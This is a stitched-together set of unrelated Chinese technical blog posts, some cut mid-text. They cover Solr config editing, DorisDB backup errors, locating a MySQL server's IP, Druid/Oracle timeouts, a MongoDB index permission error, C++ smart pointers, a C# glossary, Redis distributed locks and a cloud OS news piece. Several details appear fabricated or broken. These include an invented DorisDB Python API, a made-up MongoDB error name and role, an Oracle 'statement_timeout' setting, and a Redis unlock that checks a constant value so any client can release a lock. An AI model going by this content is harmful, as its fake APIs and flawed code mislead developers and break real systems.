DocumentBuilderFactory.newInstance().newDocumentBuilder(); Document doc = db.parse(configFile); Element root = doc.getDocumentElement(); if (!root.getElementsByTagName("jmx").isEmpty()) { Node jmxNode = root.getElementsByTagName("jmx").item(0); jmxNode.getParentNode().removeChild(jmxNode); } TransformerFactory tf = TransformerFactory.newInstance(); Transformer transformer = tf.newTransformer(); transformer.setOutputProperty(OutputKeys.INDENT, "yes"); transformer.setOutputProperty("{http://xml.apache.org/xslt}indent-amount", "2"); DOMSource source = new DOMSource(doc); StreamResult result = new StreamResult(new File(configPath)); transformer.transform(source, result); 如果以上步骤无法解决问题，建议查阅相关文档或寻求专业人士的帮助。 四、总结 总的来说，Apache Solr虽然强大，但在使用过程中也会遇到各种各样的问题。了解并搞定这些常见问题后，咱们就能把Solr的潜能发挥得更淋漓尽致，这样一来，工作效率蹭蹭上涨，用户体验也噌噌提升，妥妥的双赢局面！希望本文能对你有所帮助！

数据备份过程中出错？DorisDB助你一臂之力！ 1. 引言 在数据管理的世界里，数据备份是保障业务连续性和数据安全的关键环节。然而，在实际操作中，数据备份过程中出现错误的情况时有发生，这些错误可能源于多种因素，包括硬件故障、软件兼容性问题、配置错误等。哎呀，兄弟！今天咱们得聊点实际的，就是用DorisDB处理数据备份时可能会遇到的一些小麻烦。咱们不光要理论分析，还得看看真家伙是怎么出问题的，然后怎么解决。就是要让你我都能明明白白地知道，这些事儿该怎么处理，别让它们成为你的技术路上的绊脚石。咱们得学着从实战中吸取经验，这样下次遇到类似的问题，你就不会一头雾水了，对吧？ 2. DorisDB简介与优势 DorisDB是一款高性能、分布式列式存储系统，专为大规模数据集提供实时查询服务。它支持SQL查询语言，并能高效地处理PB级别的数据。哎呀，你瞧，DorisDB这玩意儿可真给力！它提供了超棒的数据备份工具和机制，保证你的数据既完整又一致。不管遇到多复杂的状况，它都能稳稳地运行，就像个忠诚的守护神一样，保护着你的数据安全无虞。是不是感觉用起来既安心又省心呢？ 3. 备份策略的重要性 在DorisDB中，制定有效的备份策略至关重要。哎呀，这事儿可得仔细想想！咱们得定期给数据做个备份，以防万一，万一哪天电脑突然罢工或者数据出啥问题，咱还能有东西可补救。别小瞧了这一步，选对备份文件存放在哪儿，多久检查一次备份，还有万一需要恢复数据，咱得有个顺溜的流程，这每一步都挺关键的。就像是给宝贝儿们做保险计划一样，得周全，还得实用，不能光图个形式，对吧？哎呀，兄弟，咱们得给数据做个保险啊！就像你出门前检查门窗一样，定期备份数据，能大大降低数据丢了找不回来的风险。万一哪天电脑罢工或者硬盘坏掉啥的，你也不至于急得团团转，还得去求那些所谓的“数据恢复大师”。而且，备份做得好，恢复数据的时候也快多了，省时间又省心，这事儿得重视起来！ 4. 遇到问题时的常见错误及解决方法 错误1：备份失败，日志提示“空间不足” 原因：这通常是因为备份文件的大小超过了可用磁盘空间。 解决方法： 1. 检查磁盘空间 首先确认备份目录的磁盘空间是否足够。 2. 调整备份策略 考虑使用增量备份，仅备份自上次备份以来发生变化的数据部分，减少单次备份的大小。 3. 优化数据存储 定期清理不再需要的数据，释放更多空间。 python 示例代码：设置增量备份 dorisdb_backup = dorisdb.BackupManager() dorisdb_backup.set_incremental_mode(True) 错误2：备份过程中断电导致数据损坏 原因：断电可能导致正在执行的备份任务中断，数据完整性受损。 解决方法： 1. 使用持久化存储 确保备份操作在非易失性存储设备上进行，如SSD或RAID阵列。 2. 实施数据同步 在多个节点间同步数据，即使部分节点在断电时仍能继续备份过程。 python 示例代码：设置持久化备份 dorisdb_backup = dorisdb.BackupManager() dorisdb_backup.enable_persistence() 5. 数据恢复实战 当备份数据出现问题时，及时且正确的恢复策略至关重要。DorisDB提供了多种恢复选项，从完全恢复到特定时间点的恢复，应根据实际情况灵活选择。 步骤1：识别问题并定位 首先，确定是哪个备份文件或时间点出了问题，这需要详细的日志记录和监控系统来辅助。 步骤2：选择恢复方式 - 完全恢复：将数据库回滚到最近的备份状态。 - 时间点恢复：选择一个具体的时间点进行恢复，以最小化数据丢失。 步骤3：执行恢复操作 使用DorisDB的恢复功能，确保数据的一致性和完整性。 python 示例代码：执行时间点恢复 dorisdb_restore = dorisdb.RestoreManager() dorisdb_restore.restore_to_timepoint('2023-03-15T10:30:00Z') 6. 结语 数据备份和恢复是数据库管理中的重要环节，正确理解和应用DorisDB的相关功能，能够有效避免和解决备份过程中遇到的问题。通过本篇讨论，我们不仅了解了常见的备份错误及其解决方案，还学习了如何利用DorisDB的强大功能，确保数据的安全性和业务的连续性。记住，每一次面对挑战都是成长的机会，不断学习和实践，你的数据管理技能将愈发成熟。 --- 以上内容基于实际应用场景进行了概括和举例说明，旨在提供一种实用的指导框架，帮助读者在实际工作中应对数据备份和恢复过程中可能出现的问题。希望这些信息能够对您有所帮助！

怎么查看MySQL数据库IP？手把手教你找到数据库的“家” 嗨，朋友们！今天咱们来聊聊一个超级实用的小问题——怎么查看MySQL数据库的IP地址。这事儿看起来简单，但其实背后藏着不少门道。嘿，作为一个在数据库这条路上摸爬滚打多年的老鸟，我觉得是时候跟大家唠唠这个事儿了！ 首先，咱们得搞清楚为什么需要知道MySQL数据库的IP地址。其实，这个问题的答案可能因人而异。嘿，有的人捣鼓服务器连接，有的人在查网络为啥出问题，还有一堆人就单纯想搞清楚自己鼓捣出来的数据库到底“住”在哪儿，就跟想知道自家小宠物被关在哪间房一样好奇！不管你到底是为了啥，能整清楚数据库的那个IP地址，这本事可真挺关键的！那么接下来，咱们就一步步来解决这个问题！ --- 1. 本地MySQL数据库的IP地址 情况一：数据库运行在你的电脑上 如果你的MySQL数据库是安装在你自己的机器上，并且你只打算让它服务于本地的应用程序，那么它的IP地址通常就是localhost或者127.0.0.1。这是最常见的情况之一，也是初学者最容易遇到的场景。 如何确认？ 打开命令行工具（Windows用户可以用CMD，Mac/Linux用户可以用Terminal），然后输入以下命令： sql SELECT @@hostname; 这条SQL语句会返回当前MySQL服务器所在的主机名。如果你想进一步验证是不是本地环境，可以再试试： sql SELECT @@datadir; 这段代码会显示MySQL的数据目录路径。要是文件路径里提到你的用户名，或者用的是系统盘符（像 C:\ProgramData\MySQL\MySQL Server 8.0\Data 这种），那十有八九数据库就在你自己的电脑上啦！ --- 情况二：数据库运行在远程服务器上 如果你的MySQL数据库部署在一台远程服务器上，那么它的IP地址就不会是localhost了。你需要通过一些工具或者命令来获取具体的IP地址。 方法一：直接登录服务器查看 假设你有一台Linux服务器，可以通过SSH工具（比如PuTTY或终端）登录到服务器后，执行以下命令： bash ifconfig | grep "inet " 这段命令会列出服务器的所有网络接口及其对应的IP地址。如果你看到类似inet 192.168.1.100这样的输出，恭喜你，这就是MySQL数据库所在服务器的IP地址啦！ 方法二：通过MySQL命令查看 如果你已经成功连接到了远程MySQL服务器，也可以在MySQL客户端中执行以下命令： sql SELECT @@hostname; 这条命令同样会返回数据库所在的主机名。不过，这里得到的通常是服务器的域名（比如myserver.example.com）。为了找到真实的IP地址，你可以使用ping命令进行测试： bash ping myserver.example.com 通过这种方式，你可以轻松地将域名解析为实际的IP地址。 --- 2. MySQL配置文件中的IP地址 有时候，数据库的IP地址并不是动态分配的，而是明确写在了配置文件里。这种情况下，我们只需要找到配置文件的位置并读取它即可。 配置文件在哪里？ 不同的操作系统和安装方式可能会导致配置文件的位置有所不同。以下是常见的几个位置： - Linux/Unix系统：通常是/etc/mysql/my.cnf或者/etc/my.cnf。 - Windows系统：可能是C:\ProgramData\MySQL\MySQL Server 8.0\my.ini。 - macOS：可以尝试查找/usr/local/mysql/my.cnf。 打开配置文件后，搜索关键词bind-address。这个参数定义了MySQL服务监听的IP地址。例如： ini bind-address = 192.168.1.100 这里的192.168.1.100就是MySQL数据库的IP地址。如果该值为空，则表示MySQL监听所有可用的IP地址。 --- 3. 使用第三方工具检测数据库IP 如果你没有权限直接访问服务器或者配置文件，还可以借助一些第三方工具来探测数据库的IP地址。 工具推荐： 1. Nmap 一款强大的网络扫描工具，可以帮助你发现目标服务器上的开放端口和服务。 bash nmap -p 3306 yourdomain.com 如果MySQL服务正在运行并且监听了外部请求，那么这段命令会显示出相应的IP地址。 2. telnet 一种简单的远程连接工具，用于检查特定端口是否可达。 bash telnet yourdomain.com 3306 如果连接成功，说明MySQL服务正在指定的IP地址上运行。 --- 4. 小结与反思 经过一番折腾，我们终于找到了MySQL数据库的IP地址。虽然过程有些曲折，但我相信这些方法对大家来说都非常实用。在这个过程中，我也学到了很多新东西，比如如何解读配置文件、如何利用命令行工具解决问题等等。 最后想提醒大家一句：无论你是新手还是老鸟，在操作数据库时都要小心谨慎，尤其是在涉及网络配置的时候。毕竟，稍不留神就可能导致数据泄露或者其他严重后果。所以，动手之前一定要三思而后行哦！ 好了，今天的分享就到这里啦！如果你还有什么疑问或者更好的解决方案，欢迎随时留言交流。咱们下期再见！

...目需要与Oracle数据库交互，而我选用了Druid作为数据源管理工具。事情本来挺顺的，大家都觉得没啥问题，结果有一天，我们的系统突然蹦出个消息，说啥“查询超时”！就那么一下，气氛瞬间紧张了，感觉空气都凝固了似的。 当时我整个人都懵了——这到底是什么情况？是Oracle的问题吗？还是Spring Boot的锅？或者是我对Druid的理解还不够深入？带着这些疑问，我开始了一段探索之旅。今天，我想把这段经历分享给大家，希望能帮助那些和我一样遇到类似问题的朋友。 --- 2. 什么是“查询超时”？ 简单来说，“查询超时”就是你的SQL语句执行的时间超过了设定的最大允许时间，导致系统直接抛出异常。哎呀，这种情况在实际开发里真的挺常见的，特别是那种高并发的场景。你要是数据库连接池没配好，那问题就容易冒出来了，简直防不胜防！ 对于我来说，这个问题尤其令人头疼，因为我们的项目依赖于Oracle数据库，而Oracle本身就是一个功能强大的关系型数据库，但同时也有一些“坑”。比如说啊，它的默认查询超时时间可能设得有点短，要是咱们不改一下这个设置，那查询的时候就容易卡壳儿，最后连结果都拿不到。 --- 3. Spring Boot与Druid集成的基本配置 首先，让我们回顾一下如何在Spring Boot项目中集成Druid。这是一个非常基础的操作，但也是解决问题的第一步。 3.1 添加依赖 在pom.xml文件中添加Druid的相关依赖： xml com.alibaba druid-spring-boot-starter 1.2.8 3.2 配置数据源 接着，在application.yml文件中配置Druid的数据源信息： yaml spring: datasource: type: com.alibaba.druid.pool.DruidDataSource driver-class-name: oracle.jdbc.driver.OracleDriver url: jdbc:oracle:thin:@localhost:1521:orcl username: your_username password: your_password druid: initial-size: 5 max-active: 20 min-idle: 5 max-wait: 60000 time-between-eviction-runs-millis: 60000 min-evictable-idle-time-millis: 300000 validation-query: SELECT 1 FROM DUAL test-while-idle: true test-on-borrow: false test-on-return: false 这段配置看似简单，但实际上每一项参数都需要仔细斟酌。比如说啊，“max-wait”这个参数呢，就是说咱们能等连接连上的最长时间，单位是毫秒，相当于给它设了个“最长等待时间”；然后还有个“validation-query”，这个名字听起来就挺专业的，它的作用就是检查连接是不是还正常好用；最后那个“test-while-idle”，它就像是个“巡逻兵”，负责判断要不要在连接空闲的时候去检测一下这条连接还能不能用。 --- 4. 查询超时问题的初步排查 当我第一次遇到查询超时问题时，我的第一反应是：是不是Oracle那边的SQL语句太慢了？于是，我开始检查SQL语句的性能。 4.1 检查SQL语句 我用PL/SQL Developer连接到Oracle数据库，运行了一下报错的SQL语句。结果显示，这条SQL语句确实需要花费较长时间才能完成。但问题是，为什么Spring Boot会直接抛出超时异常呢？ 这时，我才意识到，可能是Druid的数据源配置有问题。于是我翻阅了Druid的官方文档，发现了一个关键点：Druid默认的查询超时时间为10秒。 4.2 修改Druid的查询超时时间 为了延长查询超时时间，我在application.yml中加入了以下配置： yaml spring: datasource: druid: query-timeout: 30000 这里的query-timeout参数就是用来设置查询超时时间的，单位是毫秒。经过这次调整后，我发现查询超时的问题暂时得到了缓解。 --- 5. 进一步优化 结合Oracle的设置 虽然Druid的配置解决了部分问题，但我仍然觉得不够完美。于是，我又转向了Oracle数据库本身的设置。 5.1 设置Oracle的查询超时 在Oracle中，可以通过设置statement_timeout参数来控制查询超时时间。这个参数可以在会话级别或全局级别进行设置。 例如，在Spring Boot项目中，我们可以通过JDBC连接字符串传递这个参数： yaml spring: datasource: url: jdbc:oracle:thin:@localhost:1521:orcl?oracle.net.CONNECT_TIMEOUT=30000&oracle.jdbc.ReadTimeout=30000 这里的CONNECT_TIMEOUT和ReadTimeout分别表示连接超时时间和读取超时时间。通过这种方式，我们可以进一步提高系统的容错能力。 --- 6. 我的感悟与总结 经过这次折腾，我对Spring Boot与Druid的集成有了更深的理解。说实话，好多技术难题没那么玄乎，就是看着吓人而已。只要你肯静下心来琢磨琢磨，肯定能想出个辙来！ 在这里，我也想给新手朋友们一些建议： 1. 多看官方文档 无论是Spring Boot还是Druid，它们的官方文档都非常详细，很多时候答案就在那里。 2. 学会调试 遇到问题时，不要急于求解，先用调试工具一步步分析问题所在。 3. 保持耐心 技术问题往往需要反复尝试，不要轻易放弃。 最后，我想说的是，编程之路充满了挑战，但也正因为如此才显得有趣。希望大家都能在这个过程中找到属于自己的乐趣！ --- 好了，这篇文章就到这里啦！如果你也有类似的经历或想法，欢迎在评论区跟我交流哦！

... 一、引言 索引与数据库性能 在 MongoDB 数据库管理中，索引是提高查询效率的关键工具。哎呀，你知道吗？在我们的数据仓库里，有时候查找信息就像在大海里捞针一样，特别慢。不过，有一个秘密武器能帮我们提速，那就是创建索引！就像你在图书馆里，如果书都按类别和字母顺序排列好，找起书来是不是快多了？索引就是这么个原理，它把我们关心的字段整理好，这样当我们需要查询时，数据库就能直接跳到对应的位置，不用翻遍整个仓库，大大提高了速度，让数据响应更快，用户体验也更棒！哎呀，你可能在搞数据库操作的时候遇到了点小麻烦。比如说，你正兴致勃勃地想给数据表添个索引，让它跑得更快更顺溜，结果却蹦出个怪怪的错误信息：“IndexBuildingPrivilegeNotFound”。这意思就是说，你的小手还缺那么一丁点儿权限，没法儿建索引呢！别急，你只需要去找管理员大哥，或者自己在设置里开开这个权限开关，问题就迎刃而解啦！记得，权限这东西可得小心用，别乱来，不然可能会影响整个系统的稳定性和安全呢。嘿，小伙伴们！这篇文章就像是一次探险之旅，带你深入探索这个棘手问题的根源，揭秘那些神奇的解决策略，顺便给你几个小贴士，让你在日后的生活中轻松避开这些坑坑洼洼。准备好出发了吗？让我们一起揭开谜团，让生活变得更加顺畅吧！ 二、理解索引权限问题 在 MongoDB 中，当你尝试创建索引时，系统会检查你是否有足够的权限来执行这个操作。这通常涉及到两个主要方面： 1. 用户角色 你需要被赋予正确的角色，这些角色允许你在特定的数据库上创建索引。 2. 数据库配置 确保你的 MongoDB 配置允许创建索引，并且相关角色已正确分配给用户。 三、排查步骤与解决策略 面对 “IndexBuildingPrivilegeNotFound” 错误，以下是一些排查和解决问题的步骤： 1. 确认用户角色 - 使用 db.getUsers() 或 db.runCommand({ users: 1 }) 命令查看当前用户的角色及其权限。 - 确认是否拥有 db.createUser 和 createIndexes 权限。 javascript // 创建新用户并赋予权限 db.createUser({ user: "indexCreator", pwd: "password", roles: [ { role: "readWrite", db: "yourDatabase" }, { role: "createIndexes", db: "yourDatabase" } ] }); 2. 检查数据库配置 - 确保你的 MongoDB 实例允许创建索引。可以通过查看 /etc/mongod.conf（Linux）或 mongod.exe.config（Windows）文件中的配置选项来确认。 - 确保 security.authorizationMechanism 设置为 mongodb 或 scram-sha-1。 3. 权限验证 - 使用 db.auth("username", "password") 命令验证用户身份和权限。 javascript db.auth("indexCreator", "password"); 四、预防与最佳实践 为了避免此类错误，遵循以下最佳实践： - 权限最小化原则：只为需要执行特定操作的用户赋予必要的权限。 - 定期审核权限：定期检查数据库中的用户角色和权限设置，确保它们与当前需求相匹配。 - 使用角色聚合：考虑使用 MongoDB 的角色聚合功能来简化权限管理。 五、总结与反思 在 MongoDB 中管理索引权限是一个既关键又细致的过程。哎呀，兄弟！掌握并恰到好处地运用这些招数，不仅能让你在处理数据库这事儿上效率爆棚，还能给你的系统安全和稳定打上一个大大的保险扣儿。就像是有了秘密武器一样，让数据跑得快又稳，而且还能防着那些不怀好意的小坏蛋来捣乱。这样一来，你的数据保管工作就不仅是个技术活，还成了守护宝藏的秘密行动呢！哎呀，你遇到了“IndexBuildingPrivilegeNotFound”的小麻烦？别急嘛，我来给你支个招！按照我刚刚说的步骤一步步来，就像解密游戏一样，慢慢找啊找，你会发现那个藏起来的小秘密。说不定，问题就在这儿呢！找到原因了，解决起来自然就快多了，就像解开了一道数学难题，是不是超有成就感的？别忘了，耐心是关键，就像慢慢炖一锅好汤，火候到了，味道自然就出来了。加油，你一定行的！嘿！兄弟，听好了，每次碰上难题，那都是咱们提升自己，长知识的好时机，就像我们在数据库这片大海上航行，每一步都让咱们更懂水性，越来越厉害！ --- 通过本文的探索，我们不仅解决了“IndexBuildingPrivilegeNotFound”这一常见问题，还深入了解了索引在数据库性能优化中的重要性，以及如何通过正确的权限管理和配置来确保数据库操作的顺利进行。希望这篇文章能为 MongoDB 用户提供有价值的参考，共同提升数据库管理的效率和安全性。

异常安全的设计：通过资源管理确保程序完整性 在编程世界中，我们经常遇到各种各样的问题，其中资源管理是至关重要的一个环节。哎呀，你猜怎么着？要是你对内存、文件啊，或者是网络连接这些玩意儿管得不好，那可就麻烦大了！搞不好程序就直接崩了，辛辛苦苦弄的数据全都没了，还有可能给坏蛋们留下可乘之机，让他们钻安全漏洞的空子。所以啊，咱们在这些事儿上可得细心点儿，别让它们成为你的大麻烦！哎呀，你瞧这C++，简直就是编程界的超级英雄嘛！它手里的工具可多啦，能让开发者们在写代码的时候，就像盖高楼大厦一样稳稳当当，既安全又可靠。想象一下，你用C++编程，就像是在用魔法，不仅能够创造出超酷的软件，还能让这些软件运行得比闪电还快，稳定性那就更不用说了，简直是无敌的存在！所以啊，如果你是个编程小能手，那C++绝对是你不可错过的神器！在这篇文章中，我们将探讨如何利用C++的特性，特别是资源管理机制，来构建异常安全的程序设计。 第一部分：资源管理的重要性 资源管理是程序设计中不可或缺的一部分，它关乎程序的稳定性和安全性。哎呀，你要是写代码的时候，不小心没把那些用到的资源，比如文件夹的小钥匙、数据库的密码本或者网线插头啥的，都给好好放回原位，那可是大麻烦啊！不光是浪费了电脑里的宝贵空间，程序要是遇到点啥意外，就像没关紧的水龙头，没法好好休息，容易出故障。更糟糕的是，这些乱糟糟的资源可能还会给坏人提供机会，让他们偷偷溜进你的系统里捣乱。所以，记得每次用完资源，都要好好收好，别让它们乱跑！因此，确保资源在不再需要时被正确地释放，对于构建健壮和可靠的软件至关重要。 第二部分：C++中的资源管理方法 C++提供了几种不同的方式来管理资源，包括智能指针、RAII（Resource Acquisition Is Initialization）原则以及手动管理资源的方法。在这篇文章中，我们将重点介绍智能指针，尤其是std::unique_ptr和std::shared_ptr，它们是现代C++中实现资源管理的强大工具。 代码示例 1: 使用 std::unique_ptr 管理资源 cpp include include class Resource { public: Resource() { std::cout << "Resource created." << std::endl; } ~Resource() { std::cout << "Resource destroyed." << std::endl; } }; int main() { std::unique_ptr resource = std::make_unique(); // 使用资源... return 0; } 在这个例子中，当 resource 对象离开作用域时（即函数执行完毕），Resource 的析构函数会被自动调用，确保资源被正确释放。这就是RAII原则的一个简单应用，它使得资源管理变得简洁且易于理解。 代码示例 2: 使用 std::shared_ptr 实现共享所有权 cpp include include class SharedResource { public: SharedResource() { std::cout << "SharedResource created." << std::endl; } ~SharedResource() { std::cout << "SharedResource destroyed." << std::endl; } }; int main() { std::shared_ptr shared_resource1 = std::make_shared(); std::shared_ptr shared_resource2 = shared_resource1; // 共享资源... return 0; } 这里展示了 std::shared_ptr 如何允许多个对象共享对同一资源的所有权。当最后一个持有 shared_resource1 的引用消失时，资源才会被释放。这种机制有助于避免内存泄漏，并确保资源在适当的时候被释放。 第三部分：异常安全的资源管理 在C++中，异常安全的资源管理尤为重要。当程序中包含可能抛出异常的操作时，确保资源在异常发生时也能得到妥善处理，是非常关键的。智能指针提供了一种自然的方式来实现这一点，因为它们会在异常发生时自动释放资源，而无需额外的保护措施。 代码示例 3: 异常安全的资源管理示例 cpp include include include class CriticalResource { public: CriticalResource() { std::cout << "CriticalResource created." << std::endl; } ~CriticalResource() { std::cout << "CriticalResource destroyed." << std::endl; } void criticalOperation() { throw std::runtime_error("An error occurred during critical operation."); } }; int main() { try { std::unique_ptr critical_resource = std::make_unique(); critical_resource->criticalOperation(); } catch (const std::exception& e) { std::cerr << "Exception caught: " << e.what() << std::endl; } return 0; } 在上述代码中，critical_operation 可能会抛出异常。哎呀，你知道的，critical_resource 这个家伙可是被 std::unique_ptr 给罩着呢！这可真是太好了，因为这样，如果程序里突然蹦出个异常来，critical_resource 就能自动被释放掉，不会出现啥乱七八糟、不靠谱的行为。这下子，咱们就不用操心资源没清理干净这种事儿啦！ 第四部分：结论 通过使用C++的智能指针和RAII原则，我们可以轻松地实现异常安全的资源管理，这大大增强了程序的可靠性和稳定性。哎呀，兄弟，你要是想让你的代码跑得顺畅，资源管理这事儿可得好好抓牢！别小瞧了它，这玩意儿能防住好多坑，比如内存漏了或者资源没收好，那程序一不小心就卡死或者出bug，用户体验直接掉分。还有啊，万一程序遇到点啥意外，比如服务器突然断电啥的，资源管理做得好，程序就能像小猫一样，优雅地处理问题，然后自己蹦跶回来，用户一点都感觉不到。这样一来，不光用户体验上去了，系统的稳定性和质量也跟着水涨船高，你说值不值！ 总之，资源管理是构建强大、安全和高效的C++程序的关键。嘿！兄弟，学了这些技术后，你就能像大厨炒菜一样，把程序做得既美味又营养。这样一来，修修补补的工作就少多了，就像不用天天洗碗一样爽快！而且，你的代码就像是一本好书，别人一看就懂，就像看《哈利·波特》一样过瘾。最后，用户得到的服务就像五星级餐厅的餐点，稳定又可靠，他们吃得开心，你也跟着美滋滋！

...初使用此结构来确保在数据库操作结束后，无论是否发生异常，都能正确关闭SqlConnection连接。try块内包含可能抛出异常的代码，catch块则用来捕获并处理特定类型的异常，finally块中的代码无论如何都会被执行，常用于资源清理工作，如关闭数据库连接、文件流等。 using()结构 , 在C中，using语句提供了一种更简洁的方式来管理那些实现IDisposable接口的对象生命周期，以确保其Dispose方法在适当的时候被调用，从而释放非托管资源或执行其他清理任务。在本文中，通过将SqlConnection对象置于using语句中，可以自动在离开using代码块时关闭数据库连接，即使在执行过程中遇到异常也能确保资源得到释放。 SqlDataReader , SqlDataReader是.NET框架中System.Data.SqlClient命名空间下的一个类，它提供了一种只进、只读、高性能的方式从SQL Server数据库获取查询结果。在文中，SqlDataReader被用来执行SQL命令并逐行读取返回的数据集，进而将这些数据转换为CategoryInfo对象，并添加到IList集合中进行后续操作。它的特点是按需读取数据，而不是一次性加载所有数据到内存，因此适用于处理大量数据的情形。 CommandBehavior.CloseConnection , 这是SqlCommand.ExecuteReader方法的一个可选参数，当设置此标志时，在SqlDataReader关闭时，会同时关闭与之关联的SqlConnection。在文章中，作者建议通过设置CommandBehavior.CloseConnection，确保在完成数据读取后能自动关闭数据库连接，从而简化了代码并降低了资源泄漏的风险。

...你有个超大的储物间（数据库或者其他服务），里面塞满了各种好玩意儿（数据），想拿啥就能拿啥！嘿，想象一下，现在有一群小毛贼（服务实例）都盯上了你的那些值钱的小宝贝，可不能让他们随便进来顺手牵羊啊！所以呢，你就得准备一把“神奇的钥匙”（锁），谁要是想进去拿东西，就必须先拿到这把钥匙才行。没有钥匙？不好意思，请自觉退散吧！ 为什么要用分布式锁呢？因为在线上系统里，多台机器可能会同时操作同一个资源，比如抢购商品这种场景。如果没有锁机制的话，就可能出现重复下单、库存超卖等问题。分布式锁嘛，简单说就是抢车位的游戏规则——在同一时间里，只能有一个家伙抢到那个“资源位”，别的家伙就只能乖乖排队等着轮到自己啦！ 不过说起来容易做起来难啊，尤其是在分布式环境下，网络延迟、机器宕机等问题会带来各种意想不到的情况。嘿，今天咱们就来唠唠，在Redis这个超级工具箱里，怎么才能整出个靠谱的分布式锁！ --- 2. Redis为什么适合用来做分布式锁？ 嘿，说到Redis，相信很多小伙伴都对它不陌生吧？Redis是一个基于内存的高性能键值存储系统，速度贼快，而且支持多种数据结构，比如字符串、哈希表、列表等等。最重要的是，它提供了原子性的操作指令，比如SETNX（Set if Not Exists），这让我们能够轻松地实现分布式锁！ 让我给你们讲个小故事：有一次我尝试用数据库来做分布式锁，结果发现性能特别差劲，查询锁状态的SQL语句每次都要扫描整个表，效率低得让人抓狂。换了Redis之后，简直像开了挂一样，整个系统都丝滑得不行！Redis这玩意儿不光跑得快，还自带一堆黑科技，像什么过期时间、消息订阅啥的，这些功能简直就是搞分布式锁的神器啊！ 所以，如果你也在纠结选什么工具来做分布式锁，强烈推荐试试Redis！接下来我会结合实际案例给你们展示具体的操作步骤。 --- 3. 实现分布式锁的基本思路 首先，我们要明确分布式锁需要满足哪些条件： 1. 互斥性 同一时刻只能有一个客户端持有锁。 2. 可靠性 即使某个客户端崩溃了，锁也必须自动释放，避免死锁。 3. 公平性 排队等待的客户端应该按照请求顺序获取锁。 4. 可重入性（可选） 允许同一个客户端多次获取同一个锁。 现在我们就来一步步实现这些功能。 示例代码 1：最基本的分布式锁实现 python import redis import time def acquire_lock(redis_client, lock_key, timeout=10): 尝试加锁，设置过期时间为timeout秒 result = redis_client.set(lock_key, "locked", nx=True, ex=timeout) return bool(result) def release_lock(redis_client, lock_key): 使用Lua脚本来保证解锁的安全性 script = """ if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end """ redis_client.eval(script, keys=[lock_key], args=["locked"]) 这段代码展示了最基础的分布式锁实现方式。我们用set命令设置了两个参数：一个是NX，意思是“只在key不存在的时候才创建”，这样就能避免重复创建；另一个是EX，给这个锁加了个过期时间，相当于设了个倒计时，万一客户端挂了或者出问题了，锁也能自动释放，就不会一直卡在那里变成死锁啦。最后，解锁的时候我们用了Lua脚本，这样可以保证操作的原子性。 --- 4. 如何解决锁的隔离性问题？ 诶，说到这里，问题来了——如果两个不同的业务逻辑都需要用到同一个锁怎么办？比如订单系统和积分系统都想操作同一个用户的数据，这时候就需要考虑锁的隔离性了。换句话说，我们需要确保不同业务逻辑之间的锁不会互相干扰。 示例代码 2：基于命名空间的隔离策略 python def acquire_namespace_lock(redis_client, namespace, lock_name, timeout=10): 构造带命名空间的锁名称 lock_key = f"{namespace}:{lock_name}" result = redis_client.set(lock_key, "locked", nx=True, ex=timeout) return bool(result) def release_namespace_lock(redis_client, namespace, lock_name): lock_key = f"{namespace}:{lock_name}" script = """ if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end """ redis_client.eval(script, keys=[lock_key], args=["locked"]) 在这个版本中，我们在锁的名字前面加上了命名空间前缀，比如orders:place_order和points:update_score。这样一来，不同业务逻辑就可以使用独立的锁，避免相互影响。 --- 5. 进阶 如何处理锁竞争与性能优化？ 当然啦，现实中的分布式锁并不会总是那么顺利，有时候会出现大量请求同时争抢同一个锁的情况。这时我们可能需要引入队列机制或者批量处理的方式来降低系统的压力。 示例代码 3：使用Redis的List模拟队列 python def enqueue_request(redis_client, queue_key, request_data): redis_client.rpush(queue_key, request_data) def dequeue_request(redis_client, queue_key): return redis_client.lpop(queue_key) def process_queue(redis_client, lock_key, queue_key): while True: 先尝试获取锁 if not acquire_lock(redis_client, lock_key): time.sleep(0.1) 等待一段时间再重试 continue 获取队列中的第一个请求并处理 request = dequeue_request(redis_client, queue_key) if request: handle_request(request) 释放锁 release_lock(redis_client, lock_key) 这段代码展示了如何利用Redis的List结构来管理请求队列。想象一下，好多用户一起抢同一个东西，场面肯定乱哄哄的对吧？这时候，咱们就让他们老老实实排成一队，然后派一个专门的小哥挨个儿去处理他们的请求。这样一来，大家就不会互相“打架”了，事情也能更顺利地办妥。 --- 6. 总结与反思 兄弟们，通过今天的讨论，我相信大家都对如何在Redis中实现分布式锁有了更深刻的理解了吧？虽然Redis本身已经足够强大，但我们仍然需要根据实际需求对其进行适当的扩展和优化。比如刚才提到的命名空间隔离、队列机制等，这些都是非常实用的小技巧。 不过呢，我也希望大家能记住一点——技术永远不是一成不变的。业务越做越大，技术也日新月异的，咱们得不停地充电，学点新鲜玩意儿，试试新招数才行啊！就像今天的分布式锁一样，也许明天就会有更高效、更优雅的解决方案出现。所以，保持好奇心，勇于探索未知领域，这才是程序员最大的乐趣所在！ 好了，今天就聊到这里啦，祝大家在编程的路上越走越远！如果有任何疑问或者想法，欢迎随时找我交流哦~

...呈现出蓬勃生机。华云数据推出的国产通用型云操作系统安超OS不仅在技术层面实现重大突破，满足了中国企业对于安全可控、高效便捷的云服务需求，更是在生态构建和产业合作上展现出强大的整合与创新能力。 近日，华为云发布了一系列针对政企用户的新产品和服务，同样强调开放生态与自主创新，通过鲲鹏生态体系推动国内软硬件产业链协同发展。此外，阿里云也在持续深化其飞天操作系统的优化升级，并联手众多合作伙伴共同打造覆盖全行业的解决方案，助力企业实现全面上云及数字化转型。 与此同时，国家对信息技术应用创新（简称“信创”）的重视程度不断提升，政策层面大力扶持自主可控的信息技术发展，为包括安超OS在内的国产化云操作系统提供了更为广阔的发展空间。在这样的背景下，以华云数据为代表的国内科技企业正积极推动国产化信息技术产品的研发与应用，赋能千行百业，共建数字经济新生态。 另外，在全球范围内，云操作系统的重要性也日益凸显。例如，微软Azure Stack作为混合云解决方案的核心组件，不断强化其通用性与兼容性，旨在帮助企业客户无缝地在本地环境和公有云之间迁移工作负载。这些国际趋势进一步印证了华云数据选择推出安超OS这一战略决策的前瞻性和正确性。 综上所述，华云数据发布的安超OS国产通用型云操作系统，在国内外云计算市场竞争中占据了有利位置，反映出我国企业在科技创新和生态建设方面的实力提升，也为未来数字经济的发展注入了强劲动力。随着更多企业的加入和市场的逐步成熟，我们有理由相信，基于国产云操作系统的行业解决方案将在促进经济社会高质量发展中发挥更加关键的作用。

